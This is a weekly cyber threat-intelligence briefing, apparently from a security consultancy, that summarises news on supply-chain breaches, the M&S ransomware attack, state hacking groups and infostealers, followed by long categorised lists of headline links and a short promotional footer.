There has been a sharp rise in supply chain risks, with over a third (35%) of breaches in 2024 linked to third parties, up 6.5% from last year, and 4.5% now involving fourth parties. Nearly half of these third-party breaches stemmed from technology services, though attack surfaces are diversifying. Ransomware operations are increasingly exploiting supply chains, with 41% of attacks originating via third-party vectors. Subsidiaries and acquisitions now account for nearly 12% of third-party breaches, exposing internal blind spots. The findings underscore the urgent need for continuous, real-time monitoring of vendor ecosystems, as traditional periodic assessments are no longer sufficient.
https://www.helpnetsecurity.com/2025/05/27/third-party-breaches-increase/
Any Teenager Can Be a Cyber Attacker Now, Parents Warned
There has observed a shift in the cyber crime landscape, with younger, less technically skilled individuals now able to participate in serious offences using widely available online tools. Hacking communities such as “the Com” have evolved into organised groups engaging in ransomware, fraud and extortion, with some members living extravagantly on stolen cryptocurrency. The recent cyber attack on UK retailer M&S, linked to this network, could cost the retailer up to £300 million. Authorities warn that parents and organisations alike must be more alert, as cyber crime becomes more accessible, socially driven and increasingly blurred with real-world violence and intimidation.
New Russian State Hacking Group Hits Europe and North America
Microsoft has identified a newly active Russian state-affiliated group, called Void Blizzard or Laundry Bear, targeting government bodies and critical industries across Europe and North America. The group has compromised multiple organisations, including Ukrainian aviation and Dutch police entities, with tactics ranging from password spraying to spear phishing using spoofed authentication pages. Recent campaigns targeted over 20 NGOs with malicious QR codes to harvest credentials. Post-compromise activity includes automated data theft from cloud platforms and access to Microsoft Teams. Intelligence agencies warn that the group is seeking sensitive defence-related information, particularly linked to NATO, EU member states and military support for Ukraine.
https://www.infosecurity-magazine.com/news/russian-state-group-europe-america/
DragonForce Engages in "Turf War" for Ransomware Dominance
Sophos has revealed that the ransomware group DragonForce is engaged in a power struggle with rivals in a bid to dominate the cyber crime landscape. Following a rebrand into a ‘cartel’ model and launch of its white-label ransomware platform, DragonForce has targeted competitors and appears responsible for the sudden outage of a rival group’s infrastructure in March. This internal warfare has disrupted some operations but has not reduced the threat to organisations. Instead, researchers warn it may lead to more unpredictable and opportunistic cyber attacks, requiring businesses to strengthen incident response and threat monitoring capabilities.
https://www.infosecurity-magazine.com/news/dragonforce-turf-war-ransomware/
Governance, Risk and Compliance
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
Welcome to the age of cyber insecurity in business
M&S boss: I went into shock over cyber attack
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
When leaders ignore cyber security rules, the whole system weakens | Computer Weekly
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Cyber Security Teams Generate Average of $36M in Business Growth - Infosecurity Magazine
Why Cyber Security Is Shifting From Detection To Performance
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce used MSP's RMM software to distribute ransomware • The Register
DragonForce Engages in "Turf War" for Ransomware Dominance - Infosecurity Magazine
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
Cyber criminals exploit AI hype to spread ransomware, malware
Any teenager can be a cyber attacker now, parents warned
In cyber attacks, humans can be the weakest link
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
How CISOs can defend against Scattered Spider ransomware attacks | CSO Online
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Sophos warns MSPs over DragonForce threat | Microscope
'Everest Group' Extorts Global Orgs via SAP's HR Tool
'Kisses from Prague': The fall of a Russian ransomware giant
The rise and rise of ransomware - Chris Skinner's blog
Ransomware Victims
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
M&S boss: I went into shock over cyber attack
In cyber attacks, humans can be the weakest link
Retail attacks put cyber security in the spotlight | ICAEW
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
Hackers just hit a $5B hospital empire, demand ransom | Cybernews
Nova Scotia Power Confirms Ransomware Attack, 280k Notified of Data Breach - SecurityWeek
Luxury jet company allegedly faces data breach | Cybernews
Nova Scotia Power confirms it was hit by ransomware
The rise and rise of ransomware - Chris Skinner's blog
Victoria’s Secret Website Taken Offline After Cyber Attack - SecurityWeek
Phishing & Email Based Attacks
How to spot phishing emails now that AI has cleaned up the typos
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
'Haozi' Gang Sells Turnkey Phishing Tools to Amateurs
Less than eight percent of top domains implement the toughest DMARC protection
Threat actors abuse Google Apps Script in evasive phishing attacks
Threat Actors Impersonate Fake Docusign Notifications To Steal Corporate Data
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
New Browser Exploit Technique Undermines Phishing Detection - Infosecurity Magazine
New Russian cyber-spy crew Laundry Bear joins the pack • The Register
What to do if your Facebook account has been phished, hacked, stolen
Gone phishing: the rise of retail cyber crime in four charts
‘Secure email’: A losing battle CISOs must give up | CSO Online
Other Social Engineering
In cyber attacks, humans can be the weakest link
Cyber criminals exploit AI hype to spread ransomware, malware
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
How well do you know your remote IT worker? - Help Net Security
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
WSJ: US probes fake White House staff plot | Cybernews
Late night cyber attack targets Israelis with fake hostage calls
Fraud, Scams and Financial Crime
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Public urged to create secret passwords with family and friends to avoid AI-generated scams
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
How CISOs can regain ground in the AI fraud war - Help Net Security
US sanctions firm linked to cyber scams behind $200 million in losses
Artificial Intelligence
How to spot phishing emails now that AI has cleaned up the typos
Cyber criminals exploit AI hype to spread ransomware, malware
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Cyber criminals Take Advantage of ChatGPT and Other Generative AI Models | Security Magazine
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
How well do you know your remote IT worker? - Help Net Security
Public urged to create secret passwords with family and friends to avoid AI-generated scams
How CISOs can regain ground in the AI fraud war - Help Net Security
Rethinking Data Privacy in the Age of Generative AI
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
Most AI chatbots devour your user data - these are the worst offenders | ZDNET
Malware
Cyber criminals exploit AI hype to spread ransomware, malware
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
SilverRAT Source Code Leaked Online: Here’s What You Need to Know
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Fake Zenmap. WinMRT sites target IT staff with Bumblebee malware
Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Hackers increasingly target UEFI and bootloaders | Cybernews
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
GitHub becomes go-to platform for malware delivery across Europe - Help Net Security
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Latrodectus malware detected on over 44K IPs | Cybernews
PumaBot Targets Linux Devices in Botnet Campaign
From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign
$24 Mln In Cryptocurrency Seized From Russian Malware Network
New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency
Bots/Botnets
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
PumaBot Targets Linux Devices in Botnet Campaign
Mobile
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
If You Get This Message On Your Phone It’s An Attack
Internet of Things – IoT
PumaBot Targets Linux Devices in Botnet Campaign
States Have a TP-Link Problem - The National Interest
Data Breaches/Leaks
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
NHS trusts in London and Southampton hit by cyber attack
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Hackers claim major French govt email data breach | Cybernews
Adidas Falls Victim to Third-Party Data Breach
Luxury jet company allegedly faces data breach | Cybernews
Organised Crime & Criminal Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Any teenager can be a cyber attacker now, parents warned
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
$24 Mln In Cryptocurrency Seized From Russian Malware Network
US sanctions firm linked to cyber scams behind $200 million in losses
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Hacker steals $223 million in Cetus Protocol cryptocurrency heist
Dark Partners cyber crime gang fuels large-scale crypto heists
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Insider Risk and Insider Threats
In cyber attacks, humans can be the weakest link
Why layoffs increase cyber security risks - Help Net Security
US intelligence agency employee charged with espionage | AP News
Insurance
Cyber attack Surge Benefits Insurers, Prompts Rethink on Premiums
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
What UK retail breaches mean for the global cyber insurance market | Insurance Business America
Supply Chain and Third Parties
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Cloud/SaaS
SaaS companies in firing line following Commvault attack • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Outages
SentinelOne back online after lengthy outage • The Register
Encryption
Experts "deeply concerned" by the EU plan to weaken encryption | TechRadar
Quantum Computing Threat to Cryptography
Linux and Open Source
PumaBot Targets Linux Devices in Botnet Campaign
Passwords, Credential Stuffing & Brute Force Attacks
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
Social Media
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
What to do if your Facebook account has been phished, hacked, stolen
Regulations, Fines and Legislation
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
Major conference in San Antonio shelved due to US policy climate
Banks Want SEC to Rescind Cyber Attack Disclosure Requirements
US Government Launches Audit of NIST’s National Vulnerability Database - Infosecurity Magazine
Models, Frameworks and Standards
How FedRAMP Reciprocity Works with Other Frameworks - Security Boulevard
Careers, Working in Cyber and Information Security
Armed forces charity steps in to address cyber mental health crisis | Computer Weekly
Christian Timbers: Cyber Security Executive Pay Up 4.3% in 2025
Cyber Security salaries in 2025: Shifting priorities, rising demand for specialized roles | SC Media
Law Enforcement Action and Take Downs
Latrodectus malware detected on over 44K IPs | Cybernews
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Misinformation, Disinformation and Propaganda
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK Government invests £1bn to equip the army for cyber war, defence secretary reveals
US intelligence agency employee charged with espionage | AP News
Britain’s new defence pact with the EU
Nation State Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Midyear Roundup: Nation-State Cyber Threats in 2025
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
US intelligence agency employee charged with espionage | AP News
China
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
China hacks show they're 'preparing for war': McMaster • The Register
States Have a TP-Link Problem - The National Interest
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
Prague blames Beijing for cyber attack on foreign ministry
Chinese Hacking Group 'Earth Lamia' Targets Multiple Industries - SecurityWeek
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
China, Taiwan trade accusations over cyber attacks | Reuters
Russia
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
New Russian state-sponsored APT quickly gains global reach, hitting expansive targets | CyberScoop
New Russian State Hacking Group Hits Europe and North America - Infosecurity Magazine
NCSC pins ‘malicious campaign’ of cyber attacks on Russian military intelligence – PublicTechnology
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
'Kisses from Prague': The fall of a Russian ransomware giant
Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents
Russia sentences programmer to 14 years for treason • The Register
Iran
85 Iranian cyber attacks linked to killing plots foiled in 2025, Israel says | Iran International
North Korea
How well do you know your remote IT worker? - Help Net Security
Tools and Controls
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums
Why layoffs increase cyber security risks - Help Net Security
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Welcome to the age of cyber insecurity in business
US, allies push for immediate SIEM, SOAR implementation | SC Media
Why Cyber Security Is Shifting From Detection To Performance
What is OSINT and why it is so important to fight cyber criminals? | TechRadar
SaaS companies in firing line following Commvault attack • The Register
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
The edge devices security risk: What leaders can do | IT Pro
Less than eight percent of top domains implement the toughest DMARC protection
AI Beats 90% of Human Teams in a Hacking Competition
Why data provenance must anchor every CISO’s AI governance strategy - Help Net Security
Recent Acquisitions Illustrate Consolidation Trends in Cyber Security | MSSP Alert
CISA's New SIEM Guidance Tackles Visibility and Blind Spots
‘Secure email’: A losing battle CISOs must give up | CSO Online
Incident Response Planning - Preparing for Data Breaches
Explaining What’s Happened in a Cyber Attack Is Challenging
Predictive Cyber Risk Analysis Using Aggregated Threat Intelligence
Building resilient cyber threat intelligence communities | Computer Weekly
SentinelOne back online after lengthy outage • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Hackers claim major French govt email data breach | Cybernews
This National Guard unit went analog to simulate a cyber attack
Cyber security challenges could pave the way to a unified approach
Other News
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
Britain’s new defence pact with the EU
Why pilots fear that airplanes will be the next target of cyber hackers
The US Is Building a One-Stop Shop for Buying Your Data | WIRED
94 billion browser cookies sold on Telegram | Cybernews
The Cyber Security Catch That Comes With Free Public Wi-Fi
Banks report growing number of cyber attacks against clients | Radio Prague International
This National Guard unit went analog to simulate a cyber attack
Japan to draw up new cyber security strategy by year-end - Japan Today
Cyber security in mining: protecting infrastructure and digital assets | A&O Shearman - JDSupra
Airplane crash-detection systems could be vulnerable | The Week
Vulnerability Management
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
Not Every CVE Deserves a Fire Drill: Focus on What’s Exploitable
CVE Uncertainty Underlines Importance of Cyber Resilience
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
Hackers increasingly target UEFI and bootloaders | Cybernews
NIST Launches Metric to Measure Likelihood of Vulnerability Exploits - Infosecurity Magazine
New Attack Bypasses HTTP/2 Security for Arbitrary Cross-Site Scripting
Microsoft wants Windows Update to handle all apps | The Verge
Vulnerabilities
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
ConnectWise Confirms Hack, “Very Small Number” of Customers Affected - Infosecurity Magazine
Questions mount as Ivanti tackles another round of zero-days | CyberScoop
SaaS companies in firing line following Commvault attack • The Register
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Thousands of Asus routers are being hit with stealthy, persistent backdoors - Ars Technica
Cisco security flaw exploited to build botnet of thousands of devices | TechRadar
Chrome 137, Firefox 139 Patch High-Severity Vulnerabilities - SecurityWeek
Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin
Apple Safari exposes users to fullscreen browser-in-the-middle attacks
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 23 May 2025
Black Arrow Cyber Threat Intelligence Briefing 25 May 2025:
-M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
-Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
-Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
-Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
-Cyber Security Now HSBC’s Largest Operational Cost
-Best Practices for Board-Level Cyber Security Oversight
-The Importance of Culture in an Effective Cyber Security Programme
-You Do a Fire Drill, so Do a Cyber Attack Drill
-Many Rush into GenAI Deployments, Frequently Without a Security Net
-SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
-Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
-Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
-Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
The unfolding story of the recent incidents at the UK retailer Marks & Spencer (M&S) and others gives us insights into the risks faced by organisations in all sectors and locations. It is reported that M&S’ outsourced IT provider is conducting an internal investigation to establish if it was the main cause of the incident which has caused significant harm to the retailer. The Chief Executive of M&S is reported to be facing a loss of £1.1m in remuneration due to the attack, while the UK’s data protection authority is investigating the loss of personal information during the incident.
These factors of supply chain risks, regulatory investigations, and personal losses of senior leadership, remind us of the need for all organisations to properly understand and manage their risks. The newly reported attack on food distributor Peter Green Chilled further highlights the need for robust due diligence and embedding cyber security requirements in supplier relationships.
Our review of threat intelligence highlights that despite long-standing guidance, many organisations still fail to act on basic protections. Regulators and insurers alike are now focusing more heavily on board-level accountability and cultural readiness, rather than purely technical defences. From conducting cyber attack drills to strengthening oversight structures, effective governance must be proactive, not reactive. HSBC’s admission that cyber security is now its single largest operational cost underscores just how strategic this issue has become.
Finally, the rise of infostealer malware, generative AI risks, and nation-state espionage campaigns such as APT28 are expanding the threat landscape. Black Arrow urges executives to conduct an impartial cyber risk assessment of their organisation, including their supply chain, and to ensure that this analysis and the resulting cyber security strategy are governed as part of the business-wide risk management.
Top Cyber Stories of the Last Week
M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
Tata Consultancy Services is investigating whether it was the entry point for a recent cyber attack on UK retailer Marks and Spencer (M&S), which has forced the shutdown of M&S’ online clothing business for over three weeks. The breach resulted in customer data being stolen, wiped more than £750m off M&S’s market value, and could cost up to £300m in operating profit. M&S Chief Executive Stuart Machin faces a potential £1.1m loss in deferred bonuses and share-based incentives. M&S attributed the incident to human error at a third-party supplier. The UK’s data protection authority (ICO) is now assessing accountability, with potential fines of up to £17.5m. The case highlights growing concerns over third-party risks and the broader vulnerability of IT outsourcing partnerships to increasingly organised cyber crime.
https://www.ft.com/content/c658645d-289d-49ee-bc1d-241c651516b0
https://www.ft.com/content/43531d25-4f7a-4d6e-b809-e85bb8f0033e
Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
A ransomware attack on UK chilled food distributor Peter Green Chilled has disrupted deliveries to major UK supermarkets, with fresh produce left in limbo and small businesses facing losses of up to £100,000. While transport operations continue, order processing was halted, and communication channels remain limited. The incident underscores the growing threat to supply chain resilience, as cyber criminals increasingly target operational systems to inflict maximum disruption. Experts warn that these attacks are no longer just data breaches but full-blown operational crises, with widespread financial and societal consequences, making investment in cyber resilience critical for the retail sector and its partners.
https://www.theregister.com/2025/05/20/ransomware_attack_on_food_distributor/
Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
Despite years of guidance, the UK GCHQ’s National Cyber Security Centre warns that British organisations are still failing to act on freely available cyber security advice. Recent attacks on major retailers and government bodies have highlighted a growing gap between escalating risks and national readiness. Leaders are being urged to take immediate action, as regulatory pressure mounts through a proposed Cyber Resilience Bill aiming to improve supply chain security and grant stronger enforcement powers.
Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
Executive complacency is emerging as one of the most critical cyber security threats facing organisations today. While insurance and outsourced services can help, they do not absolve leadership of responsibility. Businesses that suffer a cyber attack may face not only operational downtime but also severe reputational damage, which can erode customer trust and long-term viability. Increasingly, insurers are expanding cover to address risks from non-technology vendors and reputational harm, but only where financial loss can be clearly demonstrated. Experts urge board-level engagement and regular risk assessments, with many tools now available to support benchmarking and proactive cyber resilience planning.
Cyber Security Now HSBC’s Largest Operational Cost
HSBC UK has confirmed that cyber security is now its largest operational expense, with hundreds of millions of pounds spent annually to defend against constant digital threats. The bank’s CEO highlighted that attacks are relentless, with over 1,000 transactions processed every second and around 8,000 IT changes made weekly. As customers increasingly rely on digital services, resilience and rapid recovery are critical. This comes as scrutiny intensifies across the financial sector, following widespread service outages and incidents linked to third-party software failures affecting major UK banks.
Best Practices for Board-Level Cyber Security Oversight
Corporate boards are under growing regulatory and operational pressure to strengthen their cyber security oversight. New US disclosure rules now require public companies to outline board-level governance, including how often cyber risks are reviewed, how incidents are reported, and how security is embedded into wider business strategy. Best practice calls for boards to maintain a dedicated oversight structure, meet with the CISO quarterly, and integrate cyber resilience into enterprise risk management. Regular briefings, external expertise, and realistic incident response protocols are essential to ensure accountability, reduce exposure, and support informed, agile decision-making in a dynamic threat landscape.
https://www.techtarget.com/searchsecurity/tip/Best-practices-for-board-level-cybersecurity-oversight
The Importance of Culture in an Effective Cyber Security Programme
A strong cyber security culture is as vital as technical controls in protecting an organisation. Success hinges on leadership fostering a security-first mindset, where all employees understand their role in safeguarding information. Open communication, regular training, and a non-punitive approach to incident reporting create an environment of shared responsibility. When security is embedded into daily operations and visibly supported by leadership, organisations are better equipped to respond to threats and reduce risk. As threats evolve, this cultural foundation enhances resilience and ensures that cyber security remains a collective and continuous priority across the business.
https://www.jdsupra.com/legalnews/the-importance-of-culture-in-an-8005006/
You Do a Fire Drill, so Do a Cyber Attack Drill
Recent cyber attacks on major British retailers have underscored that cyber security is not a luxury but a necessity for all businesses. The disruption caused has ranged from operational paralysis to reputational harm, with some customers even left without basic services. A key takeaway is that strong technology alone is not enough: cultural preparedness and leadership involvement are critical. Just as businesses conduct fire drills, cyber attack simulations should be standard practice. Organisations that fail to plan for continuity, train key personnel, and embed cyber security into contracts and culture risk serious legal, financial, and operational consequences.
https://www.scotsman.com/business/you-do-a-fire-drill-so-do-a-cyber-attack-drill-5137321
Many Rush into GenAI Deployments, Frequently Without a Security Net
Thales research shows that 70% of organisations now rank the rapid growth of generative AI (GenAI) as their top security concern, with many moving ahead before fully securing their environments. A third are already operationalising GenAI, often without a clear understanding of how it integrates with existing systems. Despite this, 73% are actively investing in AI-specific defences, including tools from cloud providers and emerging vendors. GenAI security has become the second-highest priority after cloud security. At the same time, organisations remain alert to evolving risks, including phishing and post-quantum threats, yet many are still lagging in implementing robust countermeasures.
https://www.helpnetsecurity.com/2025/05/22/genai-adoption-security-concern/
SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
Research shows that over half of UK businesses have suffered a cyber attack in the past five years, with small and medium-sized businesses (SMBs) particularly at risk due to limited budgets, overworked IT teams, and lack of staff training. These weaknesses have led to an estimated £3.4 billion in annual losses for UK SMBs alone. As cyber threats become more advanced, fuelled by artificial intelligence and accessible criminal tools like ransomware-as-a-service, organisations must invest in basic protections, clear policies, and realistic staff training. Without this, the average cost of a breach could escalate alongside reputational and operational damage.
https://www.techradar.com/pro/smbs-remain-easy-pickings-for-cybercriminals-heres-why
Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
A security researcher has uncovered a publicly exposed database containing over 184 million stolen login credentials from major platforms including Microsoft, Google and PayPal. The 47GB trove, believed to be collected via infostealer malware, included plaintext usernames, passwords and sensitive terms such as "bank" and "wallet", significantly raising the risk of financial fraud. Among the records were over 220 government email addresses spanning 29 countries, signalling potential national security implications. The incident highlights the ongoing threat posed by data harvested through phishing and malicious downloads, and underscores the critical importance of strong passwords, two-factor authentication and continuous monitoring.
Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
LummaC2, a leading malware-as-a-service platform, infected approximately 10 million systems worldwide before a coordinated international takedown disrupted its operations. Used by cyber criminals to harvest sensitive data, including login credentials, financial information, and browser-stored details, the malware is linked to over $36 million in credit card theft in 2023 alone. Victims ranged from individuals to Fortune 500 companies across sectors such as healthcare, finance, and education. Although the group’s infrastructure has been dismantled, authorities warn that the threat may re-emerge, highlighting the ongoing need for vigilance and cross-sector collaboration to protect against sophisticated data theft operations.
https://cyberscoop.com/lumma-infostealer-widespread-victims/
Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that a Russian state-sponsored group, APT28, is actively targeting Western logistics and technology firms supporting aid to Ukraine, posing a growing threat to NATO-aligned supply chains. Since 2022, organisations across 13 countries have been compromised, including those in defence, rail, and maritime sectors. The attackers used a mix of phishing, brute-force attacks, and exploitation of known software flaws to access systems, steal credentials, and exfiltrate sensitive shipment and personnel data. The campaign also leveraged live IP camera feeds near Ukraine’s borders. Authorities expect this espionage-focused activity to persist.
Governance, Risk and Compliance
Businesses ignore advice on preventing cyber attacks, says GCHQ
Jump in cyber attacks should put businesses on high alert | Computer Weekly
You do a fire drill, so do a cyber attack drill
Best practices for board-level cyber security oversight | TechTarget
Cyber attack threat keeps me awake at night, bank boss says - BBC News
Cyber Security now HSBC's largest operational cost | Mortgage Introducer
The Hidden Cyber Security Risks of M&A
The Importance of Culture in an Effective Cyber Security Program | Ankura - JDSupra
Threats
Ransomware, Extortion and Destructive Attacks
What we know about DragonForce ransomware • The Register
Scattered Spider snared financial orgs before retail • The Register
Service desks are under attack: What can you do about it?
Scattered Spider's Ties to Russia: Closer Than We Think?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
Ransomware gangs increasingly use Skitnet post-exploitation malware
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Ex-NSA listened to Scattered Spider's calls: 'They're good' • The Register
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
VanHelsing ransomware builder leaked on hacking forum
Growing Number Of Targeted Businesses Paying Cyber Criminals, Survey Shows | Scoop News
New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads
Ransomware Victims
How hackers went undetected for 52 hours to cripple M&S
M&S chief executive faces £1.1mn pay hit after cyber attack
Ransomware strikes UK food distributor in latest retail blow • The Register
What we know about DragonForce ransomware • The Register
Service desks are under attack: What can you do about it?
Marks & Spencer faces $402 million profit hit after cyber attack
Why DragonForce is growing in prominence – with retailer attacks boosting its reputation | IT Pro
Investors and shoppers await clues on fallout from M&S cyber attack | Marks & Spencer | The Guardian
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
M&S and Co-Op: BBC reporter on talking to the hackers - BBC News
'Cyber Siege' BBC documentary explores 'devastating' attack on council five years on - Teesside Live
Sensitive Personal Data Stolen in West Lothian Ransomware Attack - Infosecurity Magazine
Mobile carrier Cellcom confirms cyber attack behind extended outages
